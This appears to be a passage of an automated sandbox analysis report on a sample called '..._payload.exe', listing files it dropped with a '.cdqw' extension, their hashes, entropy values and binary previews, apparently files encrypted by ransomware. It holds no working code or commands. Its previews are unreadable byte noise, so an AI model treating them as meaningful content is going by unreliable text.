                                                                                                                                                                      SHA1:0778B5AB3358C1DE203865EC7ADDE82D9FA89B4A
                                                                                                                                                                      SHA-256:6635D2334F745A35D91A35CC2A72F9599BEAEA8DACCC2CCF2CFCADEC9405F44B
                                                                                                                                                                      SHA-512:F524B5630190E582335B344008ED2A0BF986349CDE0E305FC854EA5FAD3A37C6054DFAC2262BFFA361BBC764EAEDAEB343ABD008D69D44E17B9A519140E62B55
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......3..f.....'.F....*..I.v.........._...RG.Cb7.lT.&.S.Un..."*_........h=D...+........./..nh..(^\...q.t...\.'... @.....f4U..;."..N...z......y..W.CW< s...........w..X#t........#....b8...<..L.a}T..{..O..o.......I.s_......}. ..D....e.~.F.N..*..s.[...-.;jSE"..qp...]....:^Eq.=g.\.t%.....\.#n[_K..u6...........r..,.|.....t\.uJ...{N.....W...7.I..&...5Q.I.*U..m.Sf..^..m.^.q.L...R..Ch.K.U.......@X..6........<.\0:.j..#;d.N....ID...:..B.l|e...vE*}..x...Cv.\..o'%52...\..*Di.6..;......._.5kes .)..`H..T..^..aY.B]S.l..n45.....l]..h........co...O.Nf.~.b..U.+mB..'....N.)P.....td......TZ.b.0..`.X...AU....|jT....^......."42p.d..'.'y.;Dr.V&y.#.M..9/.6...z....D.wn.N.......*.a.B/.M.^...b&..8.$Q...&...u..J...9.GT............y.4.zD.Thsi._........a@o)c3c....[..7..V..0a.k..P...5..X.....U....c...l........o ..pBS;.y.M9....lr;k.er.V....s;..a.OBz._...$X.;.....5...._..V.....'PK..H...[.:..u.t.n..\{.....toE...."./.PQ10.S.D..hO..n.s...4...'B%....wG......q.3..;....L.....

                                                                                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00002.jrs.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3146062
                                                                                                                                                                      Entropy (8bit):0.6705590872486562
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:Fi+mQ0anCri1rwAVbcrbZz9RybImRlC33:FiMnJUAKrVz9RyLs
                                                                                                                                                                      MD5:EA7D8B37CF008F055F06925990634F74
                                                                                                                                                                      SHA1:F8696D2E44C8583B809D9B0D1F761E4BD0501E57
                                                                                                                                                                      SHA-256:55F9205BE63B94F63029496D76F5B326EE75968F4EBF456961304783C587DF23
                                                                                                                                                                      SHA-512:977AE60094DEA7D02551AE5A2F3D3B602588EECB24B0E5F56C8147C02B87CBBF497A55E63218DADF9EB7A9E964A07711DB919295D5692930F16047FFEDA7CB80
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......@.v3. n...].<.>:..67.<.....1#d7x[...p.6*K.0....S.A..1..{.vs..f...n./i.!.2@cu..1.8.q.".!t...%(...A..@.~....[...E...u.yM.J....`s...p.XY.._HF#..........pm.[al>E.!.^.....)...7.).m.......'...2.,.H"......p....Ph....+m-.D.. .W..b .\F....sB.....9.#o..z.......AW..fr.z....g.k-...M......8O..Z...?."}.A`Xj.Z4.P...K.s.8..t..A.,Q..W.....p%...R.t.h\8#_...3..\./.DP..-..@....).E.Q.....]..-.K.....z.0b.X3r.c.m1}.jn.c/.:.TZ.`C.....G.-y2...~...^..R~....q.;......4..q.3$.d. $....t....A.....D.../..R..."KE..HL......:^SG.>;.i..w)..I.h.(.-. ..9....5.......WW*_wc..7.`..q.....s...#+.Vd.5.0.....u..../.y.....&%.r.}.....c..X.. .s.......!.|m....K3,.......D..C.B....:.1.#e.rL.....|..q.4.k#W..X.}..4.O....s.U...e:..J..Pu..sf......Y.n=d...S.w..#{$P......p..]....t.M.....^...K....5....%.....}...%.........P.'....cN ,Lo...Q..L.k1.3...<..[A.a...d.~'[2..[.<. ....LkV...v...{..=V;.I........%Ul.i.......9....p.M...g..N...,..yR.JG...:5WA.[n..ie{..L.(...x..ff...#...`..{.$.

                                                                                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\USStmp.jtx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3146062
                                                                                                                                                                      Entropy (8bit):0.670436303821505
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:SLmA2YsnEdVjDnHjMHOHk89GLcsFw6o45MyZJ7bnMKbn7:8sEjnDMwtvLiZJ7bMCn7
                                                                                                                                                                      MD5:8DB1B2EC36BCD7D82D238DD9DE715FFD
                                                                                                                                                                      SHA1:082568D7D3C80DFD0DE1801B1EA9DA4E377F148B
                                                                                                                                                                      SHA-256:78C3466CB4A7640FF763A8466F299BCD4596223E5CC63E9FB4192B12352E74FC
                                                                                                                                                                      SHA-512:A84E38BB50399E0B7E48D7B84B61235DE68252E582273C8C46C914AE8A3F97083321DDA4B76CA6C1A9A6023E2AABC549FB315899D8F026854EA6E07258CD1758
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.....M_mw..C4L.%.Q...N..v....'"9.8...%.......Z..@....r.X..6...m4..T.)f..!P:....,.=.%..c....9.fI.5..2.o..~+..:3...jU..o...9.......s.9[..6..E..qZ)9.A^....|9...EQ..-.mN...r.?......T.w..&.z..K...1..<*.a.....B...U.......b:vj.......CY..Q..._&....0..Z..j").w(..yIY=C......>.z.+A.s.>.T...fsE`."...........A*..GF......Y....bM.TZ^.................&..WS.........F.X,'{.....#..=.".L=L.z.Z....d.>.....!S.%...w}.......t\[...4..\...=.C!=.^F\.T..7..p1..G..K..._....h.......u..@.A..F......c...f-N..c.xE.wc#...o...r{...M.). L{...5].s.pP..4.._..Of........,...y..#....u`.q.T._..i...c.n.?.\kYE=n..:.....=..XR.....!...K.E.+WI...W+n/^.89s.6......L..'AIy...B.?..&..7..q<y........ }..3..L.......v....<.T.[...)=.......#...~.....e..l.'.6..d.K.k!...y.V.j.....+....O..Pf.........".&..bD.-.^Eel..A........)0z.....D.'.. )X.\E..%T2.....G.H..eZ...4..(..:......RH".;....".u..'......n.&..N.....i............U..z.iW4.y...4.i]..^.....c.&....n+......rP./...R...o*...&f+l."

                                                                                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\store.jfm.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):16718
                                                                                                                                                                      Entropy (8bit):7.98832616024852
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:KrVLEXksIP34HIzanSc5BF2pechJ5dLOvyF2wzzHMa+OUaX:KJL7sIPxHp50vUNLjX
                                                                                                                                                                      MD5:87F28A71FC6D7B12B5406D9FBD1F4540
                                                                                                                                                                      SHA1:E15A1AC97FBAB3E14E32BDF1B7ADB2C53A415698
                                                                                                                                                                      SHA-256:512FD43956E9D3A043F222E84CCDA2172D017DCF9D37DC1709B54A5566A5F77F
                                                                                                                                                                      SHA-512:9B631194D5729B8308A52B9F0B48DA1A0FF2E58DC58D425D7ED4F8EF53BE51D98AF7DD04D853E029E2C86515A28D6E62F5A667D858C1F32930DEB54E01E98AD1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.........7|..H..F.'.T|.....<.IONh..N..gD..:....?...i.../:...XS.:@../.w..e.........=.EFX`..x......OVD.+.........Z$}2...g....=LM....M.X..+`.@.~v.8....x.......p^..jRc.......W..wC.L.[.....=r_.J8.8.SB.....N..$...gx.?.bc.... I..n..i..P.I...B.9....j....[..'...D3g...!.1r.r.bFh}.. t...i.`78.2....?..3. ..0....G.^[....}...NTK..o..K.......b!f..t...g..g..D...3Xm.... .!.gH&.o..~.A...!..E!.j.N....*.....y.l.9..0.&..a7...i'.A.0.?W4..S.B........q}.^V<&.m.....N...#!Y`.j......-.<.~\(...Y.U...+...h....?.\..(.....T.....^W..@..&..9W.[p0b...q....C..-...@.>Oa.>.9...)X..N.t...}.C.....{.....;5mC)...t..n.: ]....QZ....}..o......=Y...!..(&bT..6<..p.....V.<..r...|A[..<.W.?..ya..`.Y..}..P...0d....Do[.gtZ...i.Fr..(.dU...r....Ah......AE.O\..6....v..dw....7..G.`~...[0L....49P.,...R...U.{.`u.S.....O^..q.....0.!o....S.. c~E...h.W....Rl.5e..P..Y...P.....byPv...o'LD.......|....6..f:'.....q.Q..c^M.a....$h.....C...(...m.0/o.D..q(*...B..w..!.T..L.. z..5...0....|....D...#.....

                                                                                                                                                                      C:\Users\user\Local Settings\Comms\UnistoreDB\store.vol.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5767502
                                                                                                                                                                      Entropy (8bit):0.7569884105114273
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:qtGmzIAPF4x61sSORj36M6AoCVrzgSa+d+gOrOuWxWk3m+cun4CfYjUfSUXivOYl:yOhx61I2GoQtR3b0V
                                                                                                                                                                      MD5:EF90678A3257B5AE33BAC00E5F7FAF74
                                                                                                                                                                      SHA1:937E7E1789E365FE2AF81732C05B285D1A20578F
                                                                                                                                                                      SHA-256:CC9583EA240E541A9FB007088002A9EAEDE7D08BD9C0BA7057BC9DD85646953D
                                                                                                                                                                      SHA-512:49430644EA00C58E05661193BC4C68BC253067CFD961821A0D636503BF06CDF9335A14631ED7624865AA0F3F3C0364B061475AA74B31F99189FBCE761113FC36
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:....ha85.C..i!K.`.[...0..I..BV.....Z~....l<.....K.Z...s..&w../.'a.V......S.y..c..Y....+)k.8..W.....2........j.RO.R..k0:..:...b.D...|.6}..>.V.w.W.a`.R/...H...?....4.D..e.. .ma..=."{....r... .R...Ep<N.!.3Y..O.6.*B.6.v.t..x.^..v.r9#-.y.c...gZ..k.....|.sp.k[(..B ..|.%/@..p...bb..BF(nL.3n...`.....9...l%...'..~...OU.[tD_....Cfw..s..ZE..w(..lXQ..g..u_....S...Y..04.....4.AJyo....iB...Wt/Vz..g......f.....p.k..=Fd..FW....yN'. L.+I.$.I.....2UD...HS[....]NS..6.:.n.4@....A...=.-..r.:.MI...6{..J...4.k;4..,.. &.:~dU3...r.N.x.dG(.....P)...^s.....Sf/....>9ppA...&.[.Y+QO..9Q..oi'....3...s./cK..Q.z1..W..t...e.....,.E..B...q.?j.<.../.6...O?..@5K..Rv.h..J..k...<E.I.09~....n.Z... M....Y9.v.5@..,...m....c.E...P....q...'..2.g^.*..KS.$.....AS....^.k$.R.^>.<....y..&` .....,!.....)?..."......[).......,.;.+hM...xE....x..PJ1|...2K.1~.1...w..!O7..a....&....M.t9...AC..%.R&7s<.1...#.).0O...Oyn...G...@$u..rM....h_..U....8.+...q..;...T..]..3..l.N+e...{.....t`0B......+\I.

                                                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\brndlog.txt.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6906
                                                                                                                                                                      Entropy (8bit):7.973159588783052
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:LnxOQJZ5TorFHBZifO12AuJaTy3szwa10hgiPmT:LE8Z5Tq1OFAuJYGdZPmT
                                                                                                                                                                      MD5:742BBD7FE7D4C29CF6B66F6CA12717DA
                                                                                                                                                                      SHA1:26E4EB4A85D5B21F4D9CA5501FBE50A4E1F5F54A
                                                                                                                                                                      SHA-256:5F406DDC43B41F076BF66B9EC540256477126160AF472ED3200FC38FD9B0AEBF
                                                                                                                                                                      SHA-512:A3E2351B69F3620BDCA6BEDFD16B2681E69AC4E5C989809FD95CCF0B9688CB1892B384932AF79894085F780CF115589AE19CDC4FE63D7859749BDFAE0D952A21
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:10/03....Fv..W ....<.1OLv..".....CZM..0...?\.....V.p.z4.....f...2..7$z5...1>....kB (....Z..|z8...C.O....<..E.r....W|.......2.*.=3.r..A2Q.W...........d.'.?....A!4.IMu.kuI..0p9..N.p..K..==....wLj.st.Z1,....Llmn...h..I.]..-29.Jh. ....Xf..2U.)....>.......5.|.....wC4..8....].}A..]j...8.'.dy...F...<.......v...$Cr.g. ..Y..W.....|.}.RfZ.?`...oa.pmr_Q.]...;,@N./>.ZK.\Uj.....p+...I..D.&.h....u..`.......W.N.k..9.w.9.T.VZiW..}....M.|)cJ.Y\...$....[w$. @U.2y$5...3.fw....I. ..a.8...B.yu..n<x.;.R.7.bI..t.~m.#...7..`..e#...}....9....."|.s.l...c+pn)....+.+...N.W.J&.......(...@.nd9..&........;....xK...-.Yq.......=P...}N...<.B...H.....V.....=.L..&3y..-... t._..,E...S.i..y....Hk.R.......FW...t..S..o..).b....w....}*..?3..............h..v...+.....9..<.....W...rcSf].*.....p..z-.%.=.&cs.........1..a?@..@.G.s.X..~D...a.j....>`......-.....In3...4X1....$...`.H.}.*.xM..........7(.3..|.R.-..Pk....|..4....O8.dr.!6&.^..0.OJN+..xA.qg..*.P..nqofO.N..Fp

                                                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):834
                                                                                                                                                                      Entropy (8bit):7.733609740575759
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:QGkXr7btVHM5hkoS9x68lJxeSm5bVo2bD:Kb7btVCCoS9x68lJktVbD
                                                                                                                                                                      MD5:8FECC0F8043910D164B3B396B82E8537
                                                                                                                                                                      SHA1:794712EFFB87DB08F8DBC8E901264D0202D72DED
                                                                                                                                                                      SHA-256:4E599AC134E94916B22725177F4F6E77073DF3795814890E3423272DC2A738E9
                                                                                                                                                                      SHA-512:82C26715A3F2DEC029AFB746D4472E29DC5AF522D25665448C5D270AFE3BC7938077525C9DB7FE413A65781120FA976E3FC78F8471C5EB806566841E3262887F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..1.0......k."=...a(.)......'FA@.....f.....DpHE....<......M........J..P.U..,..yk.$...6...~.7.q]j,...t/.V.Jf.....L=.\.5?x........C)..(V.}.J.A..=A.......S.mOzU...[..QX.=.....Q}...<...9J...V)O.Ibg~..3.\;"?........N..j.fk6.Azni.}.A.......p...j{..l.n.^.X.h....&.VN>.....F/.;....'...Hz6.a.~ ...q..-..V.jq....-..[...O.`-....._.H.0.F....s}...D}.......aM.x.x.k......Y..Z.?..?...={A.d8......*....96...).t..y_..j..O.........Z*<P.-_N.pgy.......%?.2u........S......P6.S/Q>!.e..BR..s..../z!d....Q.,\.W.p6I.eT..%..gS...,..$~.U...@(6.0..|......(......j...#.YL.A...i....\`.Q.%....#..L)..3.'...~..K.Me>..$...iTND..&:\..uZ..R.iT....}.D.EtY....^_..E#.D.K...9..9.....U.3.[BW..._.n..;..SdvB.z'..j$..K...)x...\.=B.K.S.l/|..h.W.d....-.M....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Local Settings\Microsoft\Internet Explorer\ie4uinit-UserConfig.log.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (869), with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1740
                                                                                                                                                                      Entropy (8bit):7.89102934892059
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:1HSEqR+oMs+cWUnF8kVW1CEWOeqpC5jiD:1vw+oMsC4St1a+
                                                                                                                                                                      MD5:355094360A7F57A5AA71BCF8BBC1AC3B
                                                                                                                                                                      SHA1:919CC975FC3F12DA572B820F78E4B74FFC4A4C7D
                                                                                                                                                                      SHA-256:13972E7EDAD16D880879AB810F181779C7CB4268CBCC3C2E174668665193B8AC
                                                                                                                                                                      SHA-512:5C7C48731900CE46133B8D1FB9A1612FCECE24133B53092133BDA9AF4039557AE7C6D9194CEB233A753F86C326BB189A87E9E1EDDBBCE934E29EDF350CE4187E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..1.0."_..$..]..`..4.8.Z.....1p98....@....[..J.P...TP.................|..(g@.g.c.27.d..`.Z.;.D.....C..e\..(......_..0PT....8............u .M^...6.u..?A..'.[.D........x..>.r.{o..O.4............:...T.f.9..,u.>...y7*t....<._.)....].U.x............<a.r.u.m.,........R.....e.d.8..p!z.. W..y...-..G..,.qm./:_Z(....KNU.h.a...H.e`...NA.=...r_..Z&y.s....w.F(......nP.9.o}.~...f..`)........]JU....].}.ebN....A{...f..}..z.IS.t....Ha.F.`..:.Q.W.-...:./....s.D.Z....l.-q.^,.X...eVK&t...*'n.p....1..Iz..!..6.....!..b.N...c`....~...A.. ...H1.......D..1SW!|.;..c....\......<........+l.AK.7.;...q..%.iy]......59\#..:-.0....D.aE..EH.XpJZ?9.6.f....."..D6.......yBD.V.H....Z..D.`.qv..jE%].6..;.6-.....E\.........t^v.'..T2.-J....b.M.......I....n........Lxa....Qy.........#.?....,'..3..}...3i..._-,|..9>.pA9........M....Fac.^..\..J..t.P..O)a.......R...!Z..ONU.-.u.....v.U...g.....zm.go...@kQ..m.f$o.rE........=.i..<^.P..U]......]2.cZOg.O_3...V....fY..d.4.....P{..f.

                                                                                                                                                                      C:\Users\user\Local Settings\Microsoft\PenWorkspace\DiscoverCacheData.dat.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1353
                                                                                                                                                                      Entropy (8bit):7.829696781632306
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Y/gGOmx4572N09ePRiPw3sBV8Hi75Xj7ojtXj//nQLYyWaz28qn0FE42bD:Y/gGtU2mePRuw3ssHg17CVzQ0yW2QjD
                                                                                                                                                                      MD5:3BF6E4280314816156CE73BCCCA501D4
                                                                                                                                                                      SHA1:A2F04239F17A97B16B7860E588866BFB7DCAE0E6
                                                                                                                                                                      SHA-256:DB153322CBA06317C52867E930B8FA4E53D50E4798AA3760EDC6B4910E8312A7
                                                                                                                                                                      SHA-512:273854DA20203B21169514AC1B2E2AAC0173A0F53942BD2D2C3688F8083B2E04D9D5B532EA8951DB86C01691681DDCD9F64D786470B8EEA36BE6F530370653AF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"Rec.r;.. .R...M....f.Ec...T(.J|.b..%...z!YDf.M.G..5kmkZS.Hso.c..{.G........(....g. .Q-.A.>K...{.b.B...U.:.Uh."..E-/.P../_...E..,l.O.,...r...[............7...1...o...Np..nn.a....cd'.8.....4\(.z.$.c.kFk..6&nq.}.C..6.'....\..sk..N.....C...._.w+nL.GU..n.(...wp..-T...=s......o,.9'.f~.ra..#.7..t@.#i..G..h.L.n.@...)3.hV.W.}....Bz...x......3}....G..C...q...K....l".2%..W....5....(.L..}.(P.>A....x?.-.......$m5.{z*c8..DD.........F....I.:5-g.k...^..d6`.=..)...Zf"........0......i....J.F...E...D..}h|......4...s.L..[v(.5j..?$9t...>..S...Z>...:.M.y..C$^....6...BY|b...`....pE...c.. ..8LPK.:!/....yG.LPz6.....8.?,........[l"i.t.....8.g.!......q.n.0Q8.......,.7.X.q.}~.6....:.E..y{.....8...B..;..Q..K.3.I@.1...".G..(F.q$Z..O....V..F.....=r..0H....Z45..O8.....BA....Z.n^~..9G}...I..N!...v.@...f.w.B.j..q.7..p.T2.-..^a.Sn|.L.+|......ic...A.....FQ.hD.Z..L..n..[...Y..\.P..}..j..mk..2>..p..V;2......C.....J..............!..\`.i...T.}&[.|y.^s..^.o.y4..G..u....<..x....z.

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\DESKTOP-AGET0TR-20231004-1157.log.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):102646
                                                                                                                                                                      Entropy (8bit):7.998556509935242
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:a/PuMwdNriRvhgn+1zajxjeOXyxxf81m1c:KuJIR12jwhLW
                                                                                                                                                                      MD5:6E6A4272712522C2D6CE642549D42343
                                                                                                                                                                      SHA1:B26E0B74E141E998284557EEFD042BBEDEEDEEC2
                                                                                                                                                                      SHA-256:2DAD724B30470965A6DF44F682FCC7D13D45FDAD53553878ED3BA2E329985774
                                                                                                                                                                      SHA-512:2A84EE7338958CEB35FB93E40F64B9A8B0A039665B638F5EB22C6E3CC888BB303AB6EE115B3906D06BF36E4337C986FF006771C96E94267E2D987F19E032C1AE
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:..T.i-.&..G.A..K!(.R...t.W.q.T6]....d....Q]Ay.......o4.G......f.^K...c.,1o.m.Qy....?|.....8Y.....!...H..9.!.6s.irD.PpZ...R].H..Hy{,...g.K~....H.5/A~C......\.l4.9.6I..1%...j....`.`.G...!6i.@B..%J.afj.~...f....5R...E3..0..~#._.3l. G.O...d....b..v...m3.../:g.9..`.1G.....5Z.f.!.9.]..#~+...t.....u(..#....eb..7..z.;..........R'.m.p.5.......gq..p&e.D.....?...}.d.p.2..N ....\.]G.p$..\.......j"...+o.'....B..E...,!.'.r.i.%.b.d.g..G..6.j......(}gk.,T..!/^.-e_b......|Z..IC........X.~..n...`..?./x..\.oC?..|33.....U.Q.4el..xdQ.AWO.D.0....K.jHis8.GG...+.Q..B.e....~{..d..Rk...._;.'\.|.<.o.j.g;.@.....k........E.NN....P....c...VJ.M...f..?..)..*.Y+.]u9=.(.}.).X..v..=+r...1."....q.2B_.|......\<.#!...y-.._.0....XH....).w]..!...\...S..!7'..F.....}..a.k..J....hE..k$......".AI..%.X_..$..z..D.U)..N.}.....b4w....@w.9.jQ..Z.Oud4t..E4............. k.>....!n...x.....i....H..Li../`.c....3.....d.Q6.p/...y....f...)...s.b...\...?o.... ...Z..r..N&..q.F.=i.)hXa.=..$

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):24210
                                                                                                                                                                      Entropy (8bit):7.992344970000963
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:384:WxALCcO1a0N75kZ0shhdRFPa+XkUbQGoFkcaA/zVStglzxH8s5yGsKXSiCO2njNk:WxA2QIkZhhhdra+3UGskcNjdxH8SsKCC
                                                                                                                                                                      MD5:00CBEC92837BFA61321FDFD73F8525BA
                                                                                                                                                                      SHA1:695BF1A199C63AFC5570BCA827CA307549D364E6
                                                                                                                                                                      SHA-256:9BD7F975B2E014CD14AD911B24F68248CD118FC908F70521E22468D37E04B5D3
                                                                                                                                                                      SHA-512:279892F7EB40A084135DF9C4ADC3C7ECC05BF0F74CF1552736ED086B72596FAE06A1819F41FBB3F04AC8684FBBB6FB5BE315ABEE295EB712728F814926239F98
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:03-10....`.BM..D.....-..1..SY..U...R.&..@UX-&.?.r95T..h..@..J..!.f&Z.....g..`.......JJ......t:......A3.5&...R.....haP.....a..=m<..q.^...rY...RKu..3.07_"...8.'.N..q2.FZ.C........Y.Qs...iqr.P.7.-ka..ww.Q7...;..i5.j.yu{zX.m.0p5..:.|..ye.,.'........[w.-.}..o.z.[t.b.{7...<=...qK..O...|G.GxT.....tE.......yZ0(=.J../I".^...HT...k...3...S..:W..p.}?1o...>...~l1Rl.....S.V."..&M..>G..j...c....Lh'.+G..X._..g..^.....m.........'K=.5..c-.!.w....&/.l.......l.n#LOfy.D....v.n.).)..7..a....A..!0^.h..8...!."..sA..CC01....p.Y......R#....Z..Rb.....?n......3...n._?.]..w....^%..8....#[...<....Y[.TR]...k..0..?C.......C.+\6_....@...l..r.'..&...|.e...u..p*|..-G.....cV...Y....{P..Y..Q..!6..0...(....w.]c5u......a.-.yR......i..C....<Z..!]34qA.WV.q3.yDZ..E:QRF.{.xi.v.J.B.V6XMO...F..<..r%[J.hW.P....0V...w....)..;.BK,Q..5..^....T...S.k.L..>K...TU.&;...-..s..C]....daO..<p......m...8........w.gT....k.-.....O~Y..]O.......R.......t..W^..N.97.V...'..z.TT.....=. S..O..J..

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\hardz.bmp.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):602502
                                                                                                                                                                      Entropy (8bit):3.1758426787485
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:FVwMtY2yly08UBNHq213Lunp1HHxa1Xez99xR/evPObEzFgiBAePaHvt:dpylIUa2cnp1nxa1OHev2gdBRP0t
                                                                                                                                                                      MD5:C431AAEA8C96F062BAE6D3BA8DF9F3FD
                                                                                                                                                                      SHA1:A1F08C00B3F42BAB7283F3328CC32FCC8246B11F
                                                                                                                                                                      SHA-256:138769CE6EC5AA5F22285AC26F31314225C54ED3A688EAF158AEDE425B724D60
                                                                                                                                                                      SHA-512:E882C50B7A23210C982BBDF017FA8D39DFFDF7937BF4910DAF4CEA06E70620AEDDB540F009E4FA0A0F72B5E22DFBBDC126DC32E1F5C560B6D00E16297BCFDAFB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:BM80.KP.7.R. .+...Z.T..k.7....(....)........`....$.H.]<.)".......k.Ey..5.YyeL.Z........y....=...N......I|........"{....5I..T....&P....L.*H....H!..6...d....\.0.*q.W.#..T....6.4Z....W......?<..^.l&.5.Z....4......G..K......A....=7.j......0.....'.p.......1.&....&."....:..x?...`..3..yG O.`.....;)..>....v@'.-..}.O*.F|.'4.k;J..u...#?xRsh. f.ns.gj2EC.:..<.\Qn.....f. .p.+F$..> .oy..@Oy*..*L..e.A........-.......E..PD....\-....W.........~.:.G...U.GZ:...P....m...!....P6].<e.TTr1.W.KU.".m.>.?.T..T@........Y[...Mr...O.g......Sz.!...jG....g....d...g....I..0....,..Q...<.F0....v...0..I.}.ujJx..GH..%.^.k......3Y...0......D...e....I..H2...<.us.F..ko..f.x`..F.e#.i.s.i.p.@.....<@J."`.`.j.jC...&.......j.........cP....a)..tI....;...1...M.C.Jk;b.4.6.....5p8.f...R.#.....6-L-..U..nqo..B....5..6..... .K.}..k.....K....h.=b.iM.......8j{.....i....h.P."n\.....M.R...q|......B........N.H0x?2OH....7..g."...*q..*aw...8X.....5.He=U.v.~....~R...n...5.....p.|..#.uF..?Y.|.. h...Q.....D2..*.

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\user.bmp.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):602502
                                                                                                                                                                      Entropy (8bit):3.17577967829685
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:hvRRL0ezf98Y55jHQ+HWuaSvbOh/02oKyQ4Qso8/vFaD5JqwnOVZqEi7UOk+H6P9:F34+v5jFsFivQ4k6NaXtn8cxG6ctht
                                                                                                                                                                      MD5:8FA66675D2993856C4B061351E985500
                                                                                                                                                                      SHA1:6215093AF66249CE476F0F1584C361C1F6016C39
                                                                                                                                                                      SHA-256:6DD02C3EECC8B6C862595C54D4E57391A439B7D28D0BB3E199F403EE2FAFA05A
